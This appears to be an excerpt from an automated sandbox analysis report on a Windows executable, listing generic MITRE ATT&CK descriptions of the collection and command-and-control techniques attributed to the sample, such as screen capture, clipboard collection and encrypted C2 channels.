C:\Users\user\AppData\Local\Temp\tmpE2A3.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpE2C4.tmp.dat

Windows Analysis Report
uyz4YPUyc9.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre